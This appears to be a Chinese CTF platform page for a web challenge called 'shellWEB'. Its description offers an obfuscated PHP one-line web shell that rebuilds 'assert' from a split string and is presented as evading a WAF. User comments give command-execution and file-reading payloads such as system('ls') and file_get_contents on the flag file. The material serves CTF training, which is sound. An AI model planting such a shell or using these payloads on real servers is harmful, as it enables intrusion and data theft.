shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8056
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
...
登录回复
评论
谢特恒123 10天前
举报

这个题可以看到是assert是代码执行漏洞它的作用跟eval一样,我们先调用system('ls');看网页中有什么文件,发现flag文件后,直接用system('cat 文件名');就可以了,评论区我只能说:还得是大佬用这么“高深”的解法

回复 0
kitniu 19天前
举报

?s=system(dir),然后进入txt文件,flag{********}

回复 0
攻防小哥 1月前
举报

flag{********}

回复 0
smartada 1月前
举报

flag{****}

回复 0
十里故清云 2月前
举报

?s=print_r(scandir('./')) ?s=print_r(file_get_contents(%27flaga15808abee46a1d5.txt%27)) system有可能失败,别用

回复 0
TS3Rrrr 2月前
举报

大佬们 你们到底是怎么想到这些思路的我感觉在这做的每一道题都是在积累经验因为一个也想不出,只能看看大佬们的解题思路,如果不是只专攻ctf有其他类型的比赛是不是把这些思路更带入实战思考模式会好一点,还是说只要做的多就没有区别

回复 0
a6819772 4月前
举报

为什么用?s=system(type flaga15808abee46a1d5.txt)没用啊 萌新求问

回复 0
zhang 3月前
举报

cat

回复 0
TIMEtime 5月前
举报

$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; s=$poc_2($_POST['cmd']);

回复 0
Cra2yNoob 5月前
举报

为什么拿了flag,重新启动场景还要金币呀,我还想再试试有没有别的手法呢~

回复 1
banfang 6月前
举报

点击场景,然后将描述发给豆包

回复 2

WriteUp

image
harry

3 金币

立即查看

评分(10)

解题动态

19972908208 攻破了该题 9小时前
tenwool 攻破了该题 11小时前
jkljklkk 攻破了该题 13小时前
william5678 攻破了该题 15小时前
zhangwen jie 攻破了该题 16小时前
kgdw1313113 攻破了该题 17小时前
Aholic· 攻破了该题 18小时前
男小孩 攻破了该题 22小时前
银色子弹 攻破了该题 22小时前
1qaz2wsx2026 攻破了该题 22小时前
LLLEI 攻破了该题 22小时前
好久不见丶 攻破了该题 22小时前
1302074808 攻破了该题 1天前
woshicaocao 攻破了该题 1天前
山水 攻破了该题 1天前
初学者321 攻破了该题 1天前
wintersss 攻破了该题 1天前
网安小子 攻破了该题 1天前
wdsj 攻破了该题 2天前
sunpanpan 攻破了该题 2天前
问题反馈